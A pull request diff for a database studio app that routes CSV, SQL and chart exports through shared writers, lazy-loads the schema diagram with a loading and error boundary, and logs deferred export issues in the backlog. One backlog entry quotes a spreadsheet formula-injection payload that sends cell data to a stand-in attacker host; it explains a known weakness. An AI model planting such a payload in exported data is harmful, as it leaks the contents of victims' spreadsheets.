### PR TITLE
fix: escape every field an export writes, and let no plan outlive its run

### DIFF
--- a/docs/ARCHITECTURE.md
+++ b/docs/ARCHITECTURE.md
@@ -258,6 +258,8 @@ src/
     ├── llm/                 # LLM provider module
     ├── editor/              # Monaco completions (SQL + MongoDB)
     ├── schema-diff/         # Diff engine + migration SQL generator
+    ├── export/              # The writers behind every "save this to disk": RFC 4180 CSV,
+    │                        #   the SQL INSERT/DDL forms, and the one blob-download path
     ├── sql/                 # Statement splitter, alias extractor
     ├── seed/                # Seed connections (config, filter, credential resolver) + libredb-sample seeding
     ├── config/              # auth-env.ts — single JWT_SECRET reader (auth.ts, proxy.ts, oidc.ts)

--- a/docs/BACKLOG.md
+++ b/docs/BACKLOG.md
@@ -243,7 +243,86 @@ deprecated against this entry (#288): it becomes real, or goes away in a major, 
 
 ## Studio UI and query execution
 
-The entry below came out of the #384 review, verified against the merged code.
+`U2` came out of the #384 review, verified against the merged code. The `X` entries came out of the
+#422 review of the export path — each one was named, weighed and deliberately left out of that PR, so
+they are recorded here rather than re-derived by the next reader.
+
+### X1. A CSV cell beginning `=`, `+`, `-` or `@` is a formula to a spreadsheet
+
+`src/lib/export/csv.ts` writes the value it was given, exactly. A cell holding
+`=HYPERLINK("http://attacker/"&A1)` is data in the database and a formula in Excel, LibreOffice and
+Google Sheets — evaluated when the file is opened by someone who did not write the query.
+
+The fix is not in doubt (prefix such a cell with a `'`, or wrap it), but it MUTATES the user's values
+on the way out, which is the opposite of what every other line in that file does. That is a product
+decision about which of two wrong answers to give, and it wants an owner: a checkbox on the export
+menu, a setting, or a rule the docs state.
+
+Done when a cell that a spreadsheet would evaluate cannot be evaluated by opening the file, and the
+choice is stated where the user makes it.
+
+### X2. An export writes the page the grid holds, not the result the user asked for
+
+Statements run under `DEFAULT_QUERY_LIMIT` (500) and paging fetches more only when asked, so every
+export is bounded by what is on screen. #422 made that visible — the count is on the Export button and
+the menu says when more rows are still on the server (`src/lib/export/scope.ts`) — which is honesty,
+not a fix.
+
+The fix is a server-side export: a route that streams the statement's full result through the same
+writers. `csv.ts` and `result-export.ts` are pure and hold no browser reference precisely so that a
+route can reuse them; `download.ts` is the only browser-bound module in that directory. Worth costing
+against the agent's own export gap (`B33`, `B34`), which wants the same route.
+
+### X3. A binary column exports as its JSON shape
+
+A `bytea`/`BLOB` value arrives in the browser as `{"type":"Buffer","data":[1,2,…]}` (the shape
+`JSON.stringify` gives a Node Buffer) and both the grid and the CSV write exactly that: a megabyte of
+data becomes about four megabytes of digits, and no reader can turn it back.
+
+Deliberately NOT fixed in the export path alone. `src/components/results-grid/renderers/` classifies a
+value by shape and is the one place both surfaces read; a binary rule belongs there, so that the grid,
+the row detail sheet and the export agree on hex, base64 or a truncation. Fixing only the writer would
+make the file disagree with the screen.
+
+### X7. The DDL export types a numeric or a timestamp column as TEXT, because the wire hands it a string
+
+Measured in the browser against the local `dvdrental` (2026-08-18):
+`SELECT rental_rate, last_update, film_id FROM film` exports as
+`CREATE TABLE … ("rental_rate" TEXT, "last_update" TEXT, "film_id" BIGINT)`.
+
+Nothing is wrong with the inference — it never sees a number. `pg` returns `numeric` as a string to
+keep its precision, the API serializes the result to JSON, and a `timestamp` is a string by the time
+the browser reads it. So a value-shaped guess can only ever recover integer, boolean and text, and the
+dialect spellings #422 added (`NUMBER(19)`, `BINARY_DOUBLE`, `DATETIME2`, …) apply to the three kinds
+that survive the wire.
+
+The type is not lost, only unreported: `QueryResult.columnTypes` is the channel for it, and only
+ClickHouse and Druid populate it today. Done when every provider fills `columnTypes` for the columns
+it declares — which is the provider triad's own work (code ↔ docs ↔ tests per type-id), one PR, and
+it also lets the grid label a column without guessing (`ResultsGrid.declaredTypeOf` already reads it).
+
+Guessing from a string's SHAPE is not the fix and should not be attempted: it types a text column
+holding `2026-01-01` as a timestamp.
+
+### X4. Four modals stay mounted while closed, so their code cannot be split
+
+`DataProfiler`, `CodeGenerator`, `TestDataGenerator` and `DataImportModal` render `null` when closed
+but are always mounted, so lazy-loading them buys nothing until the mount is gated — and gating the
+mount changes their semantics (state resets on close). That is a behaviour change, not a bundling one.
+
+### X5. `Studio.tsx` re-renders its whole tree on every keystroke
+
+14 `useState`, no `useMemo`/`useCallback`, no memoized children, React Compiler off. The
+code-splitting in #422 is not this fix and does not help it. It touches every prop in the shell, which
+is why it was not mixed into a correctness PR. `framer-motion` is also still in the first load
+(`Studio.tsx`, `ConnectionModal`, `SchemaExplorer`, `ConnectionItem`, `TableItem` all import it
+statically and all mount on arrival).
+
+### X6. 43 lists outside `SchemaDiff` are still keyed by index
+
+`VisualExplain`, `DatabaseDocs` and the monitoring/admin tabs. `SchemaDiff` was fixed in #422 because
+its rows are recomputed and reordered; the rest need reading one at a time to tell which are stable
+lists (where an index key is fine) from which are not.
 
 ### U2. The rule that catches an arity change on a JSX handler is configured but not aimed at components
 

--- a/docs/BACKLOG.md
+++ b/docs/BACKLOG.md
@@ -243,30 +243,7 @@ deprecated against this entry (#288): it becomes real, or goes away in a major, 
 
 ## Studio UI and query execution
 
-Both entries below came out of the #384 review, verified against the merged code.
-
-### U1. A very late background EXPLAIN can still land its plan on a newer run's results
-
-#384 scoped every in-flight run to its tab (`src/hooks/use-query-execution.ts`), and the plan a
-background EXPLAIN produces is committed through `commitToTab`, which drops it when the tab has moved
-on. The guard reads the run map: `isSuperseded()` is true only when an entry exists under this tab
-and carries a different query id, so an ABSENT entry counts as not superseded. That is deliberate —
-the EXPLAIN outlives its own query, and once the query has cleared itself the plan is still the right
-plan for the results on screen.
-
-The hole is that `finally` deletes the entry (`:560`). So the sequence run A completes and clears its
-slot, run B starts and completes on the same tab, then A's slow EXPLAIN finally resolves, finds no
-entry, reads as not superseded, and writes A's plan over B's. That is the exact failure the PR set out
-to close, surviving in the one window where the map cannot answer the question. Aborting does not
-cover it either: B only aborts A's controller if A's entry is still present when B starts, and by then
-it is gone.
-
-Narrow — it needs the EXPLAIN to outlast both runs — and not reproduced live; found by reading. But it
-is silent when it happens, and a plan describing the previous statement is worse than no plan.
-
-Done when the plan's ownership is decided by something that outlives the map entry — the run's own id
-compared against the last run to commit to that tab, rather than against the presence of an entry —
-with a test that resolves the EXPLAIN after a second run has finished.
+The entry below came out of the #384 review, verified against the merged code.
 
 ### U2. The rule that catches an arity change on a JSX handler is configured but not aimed at components
 

--- a/docs/TOOLCHAIN.md
+++ b/docs/TOOLCHAIN.md
@@ -273,6 +273,21 @@ phase that can affect output.
 4. attw must use `build:lib`, not `next build`.
 5. `mock.module()` test isolation is unaffected by these static tools.
 
+## `experimental.optimizePackageImports` — measured at zero, so not enabled (2026-08-18)
+
+Proposed in #422 for `lucide-react`, `recharts`, `@xyflow/react`, `framer-motion` and `date-fns`.
+Measured before merging, and it changed nothing: first-load JS for `/` was **6030 KiB across 37 files
+with the option, and 6030 KiB across 37 files without it** — identical, measured in Chrome against
+`bun run build` + `bun run start`, summing every JS response from `/login` through the studio being
+interactive.
+
+Two reasons it cannot help here. `lucide-react`, `recharts` and `date-fns` are already in Next's own
+default list (`next/dist/esm/server/config.js`), which is concatenated with whatever the config names,
+so three of the five entries were never doing anything. And the remaining two are not barrel-of-icons
+packages, which is the shape the transform exists for.
+
+Do not re-add it without a number. The measurement takes one build and one page load.
+
 ## Suggested package versions
 
 `@biomejs/biome@^2.5`, `oxlint@^1.71`, `@arethetypeswrong/cli@^0.18.4`. `eslint` / `eslint-config-next` /

--- a/next.config.ts
+++ b/next.config.ts
@@ -12,15 +12,6 @@ const nextConfig: NextConfig = {
   // Externalize native modules to reduce bundle size and memory usage
   // These packages will be loaded from node_modules at runtime
   serverExternalPackages: ["pg", "mysql2", "mongodb", "better-sqlite3", "ssh2"],
-
-  experimental: {
-    // Rewrite barrel imports to per-module ones at build time. These five are the
-    // barrels this app imports by name and only ever uses a handful of members of —
-    // `lucide-react` most of all, where a single `import { Play } from "lucide-react"`
-    // otherwise pulls the whole icon set into the module graph before tree-shaking
-    // gets a chance. Purely a build-time transform: no source or behaviour changes.
-    optimizePackageImports: ["lucide-react", "recharts", "@xyflow/react", "framer-motion", "date-fns"],
-  },
 };
 
 export default nextConfig;

--- a/next.config.ts
+++ b/next.config.ts
@@ -12,6 +12,15 @@ const nextConfig: NextConfig = {
   // Externalize native modules to reduce bundle size and memory usage
   // These packages will be loaded from node_modules at runtime
   serverExternalPackages: ["pg", "mysql2", "mongodb", "better-sqlite3", "ssh2"],
+
+  experimental: {
+    // Rewrite barrel imports to per-module ones at build time. These five are the
+    // barrels this app imports by name and only ever uses a handful of members of —
+    // `lucide-react` most of all, where a single `import { Play } from "lucide-react"`
+    // otherwise pulls the whole icon set into the module graph before tree-shaking
+    // gets a chance. Purely a build-time transform: no source or behaviour changes.
+    optimizePackageImports: ["lucide-react", "recharts", "@xyflow/react", "framer-motion", "date-fns"],
+  },
 };
 
 export default nextConfig;

--- a/src/components/DataCharts.tsx
+++ b/src/components/DataCharts.tsx
@@ -53,6 +53,8 @@ import { Select, SelectContent, SelectItem, SelectTrigger, SelectValue } from "@
 import { storage } from "@/lib/storage";
 import { chartTheme } from "@/lib/charts/palette";
 import { useEffectiveTheme } from "@/hooks/use-effective-theme";
+import { downloadBlob } from "@/lib/export/download";
+import { logger } from "@/lib/logger";
 
 type ChartType = "bar" | "line" | "pie" | "area" | "scatter" | "histogram" | "stacked-bar" | "stacked-area";
 
@@ -578,50 +580,49 @@ export function DataCharts({ result, spec = null }: DataChartsProps) {
     [savedCharts],
   );
 
-  const exportChart = useCallback(async (format: "png" | "svg") => {
-    if (!chartRef.current) return;
+  const exportChart = useCallback(
+    async (format: "png" | "svg") => {
+      if (!chartRef.current) return;
 
-    if (format === "png") {
-      try {
-        // snapdom lets the browser rasterize a DOM snapshot, so Tailwind 4's
-        // oklch() colors export correctly (html2canvas could not parse them
-        // and failed silently). Fonts stay unembedded: Monaco's cross-origin
-        // CDN stylesheet breaks webfont CSS collection (SecurityError).
-        const { snapdom } = await import("@zumer/snapdom");
-        const capture = await snapdom(chartRef.current, {
-          backgroundColor: viz.exportBackground,
-          scale: 2,
-          embedFonts: false,
-        });
-        const blob = await capture.toBlob({ type: "png" });
-        if (!blob) throw new Error("PNG encoding produced no data");
-        const url = URL.createObjectURL(blob);
-        const link = document.createElement("a");
-        link.download = `chart_${Date.now()}.png`;
-        link.href = url;
-        link.click();
-        URL.revokeObjectURL(url);
-      } catch (error) {
-        console.error("Failed to export PNG:", error);
-        toast.error("PNG export failed", {
-          description: error instanceof Error ? error.message : String(error),
-        });
+      if (format === "png") {
+        try {
+          // snapdom lets the browser rasterize a DOM snapshot, so Tailwind 4's
+          // oklch() colors export correctly (html2canvas could not parse them
+          // and failed silently). Fonts stay unembedded: Monaco's cross-origin
+          // CDN stylesheet breaks webfont CSS collection (SecurityError).
+          const { snapdom } = await import("@zumer/snapdom");
+          const capture = await snapdom(chartRef.current, {
+            backgroundColor: viz.exportBackground,
+            scale: 2,
+            embedFonts: false,
+          });
+          const blob = await capture.toBlob({ type: "png" });
+          if (!blob) throw new Error("PNG encoding produced no data");
+          downloadBlob(blob, `chart_${Date.now()}.png`);
+        } catch (error) {
+          logger.warn("Chart PNG export failed", {
+            route: "DataCharts",
+            error: error instanceof Error ? error.message : String(error),
+          });
+          toast.error("PNG export failed", {
+            description: error instanceof Error ? error.message : String(error),
+          });
+        }
+      } else {
+        // SVG export - find the SVG element
+        const svgElement = chartRef.current.querySelector("svg");
+        if (svgElement) {
+          const svgData = new XMLSerializer().serializeToString(svgElement);
+          downloadBlob(new Blob([svgData], { type: "image/svg+xml" }), `chart_${Date.now()}.svg`);
+        }
       }
-    } else {
-      // SVG export - find the SVG element
-      const svgElement = chartRef.current.querySelector("svg");
-      if (svgElement) {
-        const svgData = new XMLSerializer().serializeToString(svgElement);
-        const blob = new Blob([svgData], { type: "image/svg+xml" });
-        const url = URL.createObjectURL(blob);
-        const link = document.createElement("a");
-        link.download = `chart_${Date.now()}.svg`;
-        link.href = url;
-        link.click();
-        URL.revokeObjectURL(url);
-      }
-    }
-  }, []);
+    },
+    // `viz` is derived from the effective theme, and this list used to be empty:
+    // after a theme toggle the PNG was still painted on the ground the chart was
+    // first rendered on — a light chart exported onto near-black. Same defect the
+    // ERD export fixed in #384, in the surface that comment points at.
+    [viz.exportBackground],
+  );
 
   const toggleYAxis = (field: string) => {
     setYAxis((prev) => {

--- a/src/components/DatabaseDocs.tsx
+++ b/src/components/DatabaseDocs.tsx
@@ -5,6 +5,7 @@ import { FileText, Loader2, Search, Sparkles, Download } from "lucide-react";
 import { cn } from "@/lib/utils";
 import { TableSchema } from "@/lib/types";
 import { renderInline } from "@/components/rich-text";
+import { downloadText } from "@/lib/export/download";
 
 interface DatabaseDocsProps {
   schema: TableSchema[];
@@ -114,13 +115,7 @@ export function DatabaseDocs({ schema, schemaContext, databaseType }: DatabaseDo
       }
     }
 
-    const blob = new Blob([md], { type: "text/markdown" });
-    const url = URL.createObjectURL(blob);
-    const a = document.createElement("a");
-    a.href = url;
-    a.download = "database-docs.md";
-    a.click();
-    URL.revokeObjectURL(url);
+    downloadText(md, "text/markdown", "database-docs.md");
   };
 
   // Simple markdown rendering for AI docs

--- a/src/components/LazyView.tsx
+++ b/src/components/LazyView.tsx
@@ -1,0 +1,87 @@
+"use client";
+
+import React from "react";
+import { LoaderCircle } from "lucide-react";
+import { logger } from "@/lib/logger";
+import { cn } from "@/lib/utils";
+
+/**
+ * What a code-split view shows while its chunk is on the wire, and what it shows when
+ * the chunk never arrives.
+ *
+ * Both belong together because they are the two halves of one decision: the views
+ * behind `React.lazy` are no longer in the bundle that has already loaded, so their
+ * arrival is a request that can be slow (say so) or fail (say that too). Leaving
+ * either unsaid is how a click on Charts becomes a spinner that never stops, or —
+ * with no fallback at all — a click that does nothing.
+ *
+ * `LoaderCircle`, not `Loader2`: on lucide-react 1.x the latter is a legacy-rename
+ * alias that ships no `@deprecated` tag, so nothing warns while it is alive and the
+ * first signal is a build breaking on the release that drops it (docs/BACKLOG.md P6).
+ */
+export function ViewLoading({ label, className }: { label: string; className?: string }) {
+  return (
+    // `output` rather than a div with role="status": it carries the live region
+    // natively, which is what jsx-a11y's prefer-tag-over-role asks for.
+    <output
+      data-testid="view-loading"
+      aria-label={label}
+      className={cn("h-full w-full flex items-center justify-center bg-sunken", className)}
+    >
+      <LoaderCircle strokeWidth={1.5} className="w-5 h-5 animate-spin text-fg-muted" />
+    </output>
+  );
+}
+
+interface ChunkBoundaryProps {
+  /** What failed, named the way the user knows it — "Charts", "the diagram". */
+  label: string;
+  children: React.ReactNode;
+}
+
+/**
+ * The boundary a failed chunk lands in.
+ *
+ * A class, because catching a render-time error is still the one thing hooks cannot
+ * do. Reloading is the honest remedy rather than a local retry: the common cause is a
+ * page whose build no longer exists on the server, and no number of retries against
+ * the old chunk names will produce it — only re-fetching the document will.
+ */
+export class ChunkBoundary extends React.Component<ChunkBoundaryProps, { failed: boolean }> {
+  state = { failed: false };
+
+  static getDerivedStateFromError() {
+    return { failed: true };
+  }
+
+  componentDidCatch(error: Error) {
+    logger.warn("A split view could not be loaded", {
+      route: "ChunkBoundary",
+      view: this.props.label,
+      error: error.message,
+    });
+  }
+
+  render() {
+    if (!this.state.failed) return this.props.children;
+    return (
+      <div
+        data-testid="chunk-error"
+        className="h-full w-full flex flex-col items-center justify-center gap-3 bg-sunken px-6 text-center"
+      >
+        <p className="text-xs font-medium text-fg-secondary">{this.props.label} could not be loaded.</p>
+        <p className="text-xs text-fg-muted max-w-sm">
+          This view is fetched when it is first opened, and the request did not complete. If the server was upgraded
+          while this page was open, reloading picks up the new one.
+        </p>
+        <button
+          type="button"
+          onClick={() => window.location.reload()}
+          className="h-7 px-3 rounded border border-hairline-strong text-xs font-medium text-fg-secondary hover:text-fg-bright"
+        >
+          Reload
+        </button>
+      </div>
+    );
+  }
+}

--- a/src/components/QueryEditor.tsx
+++ b/src/components/QueryEditor.tsx
@@ -13,6 +13,7 @@ import { registerMongoDBCompletionProvider } from "@/lib/editor/mongodb-completi
 import { registerLibreDBLanguage } from "@/lib/editor/libredb-language";
 import { configureMonacoLoader } from "@/lib/editor/monaco-loader";
 import { useEffectiveTheme } from "@/hooks/use-effective-theme";
+import { logger } from "@/lib/logger";
 
 // Serve Monaco from our own origin rather than @monaco-editor/react's jsdelivr default.
 // Runs at module load so it is in place before the first <Editor> mounts.
@@ -165,7 +166,10 @@ export const QueryEditor = forwardRef<QueryEditorRef, QueryEditorProps>(
       try {
         return JSON.parse(schemaContext);
       } catch (e) {
-        console.error("Failed to parse schema context for editor:", e);
+        logger.warn("Failed to parse the schema context; the editor completes without it", {
+          route: "QueryEditor",
+          error: e instanceof Error ? e.message : String(e),
+        });
         return [];
       }
     }, [schemaContext]);
@@ -236,7 +240,10 @@ export const QueryEditor = forwardRef<QueryEditorRef, QueryEditorProps>(
         lastSyncedValueRef.current = formatted;
         onChange?.(formatted);
       } catch (e) {
-        console.error("Formatting failed:", e);
+        logger.warn("Statement formatting failed; the editor text is left as written", {
+          route: "QueryEditor",
+          error: e instanceof Error ? e.message : String(e),
+        });
       }
     };
 

--- a/src/components/QueryHistory.tsx
+++ b/src/components/QueryHistory.tsx
@@ -3,6 +3,8 @@
 import React, { useState, useEffect, useMemo } from "react";
 import { storage } from "@/lib/storage";
 import { QueryHistoryItem } from "@/lib/types";
+import { csvRow } from "@/lib/export/csv";
+import { downloadText } from "@/lib/export/download";
 import {
   CheckCircle2,
   AlertCircle,
@@ -100,32 +102,29 @@ export function QueryHistory({ onSelectQuery, activeConnectionId, refreshTrigger
 
     if (format === "csv") {
       const headers = ["Executed At", "Status", "Connection", "Tab", "Execution Time (ms)", "Rows", "Query", "Error"];
+      // Every field goes through the shared writer. The query and the error message
+      // used to be the only two that were escaped, so a connection or tab name
+      // holding a comma shifted every column after it for that row.
       const rows = filteredHistory.map((item) =>
-        [
+        csvRow([
           item.executedAt,
           item.status,
           item.connectionName || item.connectionId,
           item.tabName || "",
           item.executionTime,
           item.rowCount || 0,
-          `"${item.query.replace(/"/g, '""')}"`,
-          `"${(item.errorMessage || "").replace(/"/g, '""')}"`,
-        ].join(","),
+          item.query,
+          item.errorMessage || "",
+        ]),
       );
-      content = [headers.join(","), ...rows].join("\n");
+      content = [csvRow(headers), ...rows].join("\n");
       mimeType = "text/csv";
     } else {
       content = JSON.stringify(filteredHistory, null, 2);
       mimeType = "application/json";
     }
 
-    const blob = new Blob([content], { type: mimeType });
-    const url = URL.createObjectURL(blob);
-    const link = document.createElement("a");
-    link.href = url;
-    link.download = fileName;
-    link.click();
-    URL.revokeObjectURL(url);
+    downloadText(content, mimeType, fileName);
   };
 
   return (

--- a/src/components/SchemaDiagram.tsx
+++ b/src/components/SchemaDiagram.tsx
@@ -22,6 +22,7 @@ import { Download, Info, Loader2, Search, X } from "lucide-react";
 import { Button } from "@/components/ui/button";
 import { motion } from "framer-motion";
 import { useToast } from "@/hooks/use-toast";
+import { logger } from "@/lib/logger";
 import { DiagramActionsContext, type DiagramActions } from "./schema-diagram/diagram-context";
 import { FkEdge } from "./schema-diagram/FkEdge";
 import { TableNode } from "./schema-diagram/TableNode";
@@ -291,7 +292,11 @@ function SchemaDiagramInner({ schema, onClose }: SchemaDiagramProps) {
         // theme the diagram is being read in.
         await exportViewportImage(format, { viewport, bounds, background: EXPORT_BACKGROUND[mode] });
       } catch (error) {
-        console.error(`Failed to export ${format.toUpperCase()}:`, error);
+        logger.warn("Diagram export failed", {
+          route: "SchemaDiagram",
+          format,
+          error: error instanceof Error ? error.message : String(error),
+        });
         toast({
           title: `${format.toUpperCase()} export failed`,
           description: error instanceof Error ? error.message : String(error),

--- a/src/components/SchemaDiff.tsx
+++ b/src/components/SchemaDiff.tsx
@@ -20,6 +20,7 @@ import { Badge } from "@/components/ui/badge";
 import { cn } from "@/lib/utils";
 import type { TableSchema, SchemaSnapshot, DatabaseType, DatabaseConnection } from "@/lib/types";
 import { storage } from "@/lib/storage";
+import { logger } from "@/lib/logger";
 import { useAllConnections } from "@/hooks/use-all-connections";
 import { diffSchemas } from "@/lib/schema-diff/diff-engine";
 import { generateMigrationSQL } from "@/lib/schema-diff/migration-generator";
@@ -125,7 +126,10 @@ export function SchemaDiff({ schema, connection }: SchemaDiffProps) {
         setSnapshots(storage.getSchemaSnapshots());
         setTargetId(snapshot.id);
       } catch (err) {
-        console.error("Failed to fetch remote schema:", err);
+        logger.warn("Failed to fetch the remote schema for a diff", {
+          route: "SchemaDiff",
+          error: err instanceof Error ? err.message : String(err),
+        });
       } finally {
         setFetchingRemote(false);
       }
@@ -410,9 +414,15 @@ function TableDiffDetail({ diff }: { diff: TableDiff }) {
         <div>
           <h4 className="text-xs text-fg-muted mb-2 font-medium">Columns</h4>
           <div className="space-y-1">
-            {diff.columns.map((col, i) => (
+            {/* Keyed by the name the row is ABOUT, not by its position: the diff is
+                recomputed whenever either side changes, and the rows come back in a
+                different order, which had React reusing one column's row for another's.
+                The inner `changes` lists are keyed by their own text — each entry names a
+                different attribute ("Type changed:", "Nullable changed:", …), so the text
+                is unique within a row and survives a reorder the way the index did not. */}
+            {diff.columns.map((col) => (
               <div
-                key={i}
+                key={col.columnName}
                 className={cn(
                   "px-3 py-2 rounded text-xs flex items-center gap-2",
                   col.action === "added" && "bg-green-500/5 border border-green-500/10",
@@ -423,8 +433,8 @@ function TableDiffDetail({ diff }: { diff: TableDiff }) {
                 <span className="font-mono text-fg-secondary min-w-[120px]">{col.columnName}</span>
                 {col.action === "modified" && (
                   <div className="flex flex-col gap-0.5">
-                    {col.changes.map((change, j) => (
-                      <span key={j} className="text-xs text-fg-muted">
+                    {col.changes.map((change) => (
+                      <span key={change} className="text-xs text-fg-muted">
                         {change}
                       </span>
                     ))}
@@ -444,9 +454,9 @@ function TableDiffDetail({ diff }: { diff: TableDiff }) {
         <div>
           <h4 className="text-xs text-fg-muted mb-2 font-medium">Indexes</h4>
           <div className="space-y-1">
-            {diff.indexes.map((idx, i) => (
+            {diff.indexes.map((idx) => (
               <div
-                key={i}
+                key={idx.indexName}
                 className={cn(
                   "px-3 py-2 rounded text-xs flex items-center gap-2",
                   idx.action === "added" && "bg-green-500/5 border border-green-500/10",
@@ -455,8 +465,8 @@ function TableDiffDetail({ diff }: { diff: TableDiff }) {
                 )}
               >
                 <span className="font-mono text-fg-secondary">{idx.indexName}</span>
-                {idx.changes.map((change, j) => (
-                  <span key={j} className="text-xs text-fg-muted">
+                {idx.changes.map((change) => (
+                  <span key={change} className="text-xs text-fg-muted">
                     {change}
                   </span>
                 ))}
@@ -472,9 +482,9 @@ function TableDiffDetail({ diff }: { diff: TableDiff }) {
         <div>
           <h4 className="text-xs text-fg-muted mb-2 font-medium">Foreign Keys</h4>
           <div className="space-y-1">
-            {diff.foreignKeys.map((fk, i) => (
+            {diff.foreignKeys.map((fk) => (
               <div
-                key={i}
+                key={fk.columnName}
                 className={cn(
                   "px-3 py-2 rounded text-xs flex items-center gap-2",
                   fk.action === "added" && "bg-green-500/5 border border-green-500/10",
@@ -482,8 +492,8 @@ function TableDiffDetail({ diff }: { diff: TableDiff }) {
                 )}
               >
                 <span className="font-mono text-fg-secondary">{fk.columnName}</span>
-                {fk.changes.map((change, j) => (
-                  <span key={j} className="text-xs text-fg-muted">
+                {fk.changes.map((change) => (
+                  <span key={change} className="text-xs text-fg-muted">
                     {change}
                   </span>
                 ))}

--- a/src/components/SchemaDiff.tsx
+++ b/src/components/SchemaDiff.tsx
@@ -482,9 +482,14 @@ function TableDiffDetail({ diff }: { diff: TableDiff }) {
         <div>
           <h4 className="text-xs text-fg-muted mb-2 font-medium">Foreign Keys</h4>
           <div className="space-y-1">
+            {/* Keyed by the action as well as the column: a foreign key repointed at
+                another table is TWO entries under one column name, because the diff
+                engine keys an FK by `columnName→table.column` and reports the old one
+                removed and the new one added. The column name alone gave React two
+                children with the same key. */}
             {diff.foreignKeys.map((fk) => (
               <div
-                key={fk.columnName}
+                key={`${fk.action}:${fk.columnName}`}
                 className={cn(
                   "px-3 py-2 rounded text-xs flex items-center gap-2",
                   fk.action === "added" && "bg-green-500/5 border border-green-500/10",

--- a/src/components/Studio.tsx
+++ b/src/components/Studio.tsx
@@ -23,6 +23,8 @@ import {
 } from "@/components/studio/index";
 import { AgentRail } from "@/components/agent/AgentRail";
 import { DatabaseConnection, SavedQuery } from "@/lib/types";
+import { ChunkBoundary, ViewLoading } from "@/components/LazyView";
+import { lazyRetry } from "@/lib/lazy";
 import { buildResultExport, type ResultExportFormat } from "@/lib/export/result-export";
 import { downloadText } from "@/lib/export/download";
 import { newLocalId } from "@/lib/ids";
@@ -73,8 +75,8 @@ import {
   true, which for most sessions is never. `React.lazy`, not `next/dynamic`, to keep the
   same seam the bottom panel uses; the diagram is reached from the embeddable shell too.
 */
-const SchemaDiagram = React.lazy(() =>
-  import("@/components/SchemaDiagram").then((m) => ({ default: m.SchemaDiagram })),
+const SchemaDiagram = React.lazy(
+  lazyRetry(() => import("@/components/SchemaDiagram").then((m) => ({ default: m.SchemaDiagram }))),
 );
 
 export default function Studio() {
@@ -342,6 +344,9 @@ export default function Studio() {
       fields,
       tabName: tabMgr.currentTab.name,
       dialect: conn.activeConnection?.type,
+      // The types the engine declared for THIS result, which is what the DDL form
+      // writes when they are there — the only source for a computed column.
+      columnTypes: tabMgr.currentTab.result.columnTypes,
     });
     downloadText(file.content, file.mimeType, `query_result_export.${file.extension}`);
   };
@@ -465,9 +470,19 @@ export default function Studio() {
             <main className="flex-1 overflow-hidden relative">
               <AnimatePresence>
                 {showDiagram && (
-                  <React.Suspense fallback={null}>
-                    <SchemaDiagram schema={conn.schema} onClose={() => setShowDiagram(false)} />
-                  </React.Suspense>
+                  /*
+                    A visible fallback, not `null`: this is the heaviest chunk in the
+                    tree (`@xyflow/react` + elk + snapdom), so the wait is the one the
+                    user is most likely to see — and a click that shows nothing at all
+                    reads as a broken button, which is answered by clicking it again.
+                  */
+                  <ChunkBoundary label="The diagram">
+                    <React.Suspense
+                      fallback={<ViewLoading label="Loading the diagram" className="absolute inset-0 z-20" />}
+                    >
+                      <SchemaDiagram schema={conn.schema} onClose={() => setShowDiagram(false)} />
+                    </React.Suspense>
+                  </ChunkBoundary>
                 )}
               </AnimatePresence>
 

--- a/src/components/Studio.tsx
+++ b/src/components/Studio.tsx
@@ -13,7 +13,6 @@ import { DataProfiler } from "@/components/DataProfiler";
 import { CodeGenerator } from "@/components/CodeGenerator";
 import { TestDataGenerator } from "@/components/TestDataGenerator";
 import { CreateTableModal } from "@/components/CreateTableModal";
-import { SchemaDiagram } from "@/components/SchemaDiagram";
 import { SaveQueryModal } from "@/components/SaveQueryModal";
 import {
   StudioMobileHeader,
@@ -24,7 +23,9 @@ import {
 } from "@/components/studio/index";
 import { AgentRail } from "@/components/agent/AgentRail";
 import { DatabaseConnection, SavedQuery } from "@/lib/types";
-import { quoteLiteral } from "@/lib/sql/values";
+import { buildResultExport, type ResultExportFormat } from "@/lib/export/result-export";
+import { downloadText } from "@/lib/export/download";
+import { newLocalId } from "@/lib/ids";
 import { resolveAgentRunConnectionId } from "@/hooks/use-connection-payload";
 import { isMobileViewport } from "@/hooks/use-mobile";
 import { useAgentCapability } from "@/hooks/use-agent-capability";
@@ -63,6 +64,18 @@ import {
   AlertDialogDescription,
   AlertDialogTitle,
 } from "@/components/ui/alert-dialog";
+
+/*
+  The ERD, split out of the first load.
+
+  It is the largest thing in this tree — `@xyflow/react`, the elk layout engine and the
+  snapdom capture used for its export — and it is mounted only while `showDiagram` is
+  true, which for most sessions is never. `React.lazy`, not `next/dynamic`, to keep the
+  same seam the bottom panel uses; the diagram is reached from the embeddable shell too.
+*/
+const SchemaDiagram = React.lazy(() =>
+  import("@/components/SchemaDiagram").then((m) => ({ default: m.SchemaDiagram })),
+);
 
 export default function Studio() {
   const queryEditorRef = useRef<QueryEditorRef>(null);
@@ -298,7 +311,7 @@ export default function Studio() {
   const handleSaveQuery = (name: string, description: string, tags: string[]) => {
     if (!conn.activeConnection) return;
     const newSavedQuery: SavedQuery = {
-      id: Math.random().toString(36).substring(7),
+      id: newLocalId(),
       name,
       query: tabMgr.currentTab.query,
       description,
@@ -312,81 +325,25 @@ export default function Studio() {
     toast({ title: "Query Saved", description: `"${name}" has been added to your saved queries.` });
   };
 
-  const exportResults = (format: "csv" | "json" | "sql-insert" | "sql-ddl") => {
+  const exportResults = (format: ResultExportFormat) => {
     if (!tabMgr.currentTab.result) return;
-    const rawData = tabMgr.currentTab.result.rows;
-    const sensitiveColumns = detectSensitiveColumnsFromConfig(tabMgr.currentTab.result.fields, maskingConfig);
-    const data = effectiveMasking
-      ? applyMaskingToRows(rawData, tabMgr.currentTab.result.fields, sensitiveColumns)
-      : rawData;
-    let content = "";
-    let mimeType = "text/plain";
-    let ext: string = format;
+    // The columns the engine declared for THIS result. The writers read every row by
+    // these names rather than by whatever keys row 0 happens to carry, so a row with
+    // a different key order — or a document store's row missing a field entirely —
+    // lands in the right column instead of shifting the rest.
+    const fields = tabMgr.currentTab.result.fields;
+    const sensitiveColumns = detectSensitiveColumnsFromConfig(fields, maskingConfig);
+    const rows = effectiveMasking
+      ? applyMaskingToRows(tabMgr.currentTab.result.rows, fields, sensitiveColumns)
+      : tabMgr.currentTab.result.rows;
 
-    if (format === "csv") {
-      const headers = Object.keys(data[0] || {}).join(",");
-      const rows = data
-        .map((row) =>
-          Object.values(row)
-            .map((val) => `"${val}"`)
-            .join(","),
-        )
-        .join("\n");
-      content = `${headers}\n${rows}`;
-      mimeType = "text/csv";
-      ext = "csv";
-    } else if (format === "json") {
-      content = JSON.stringify(data, null, 2);
-      mimeType = "application/json";
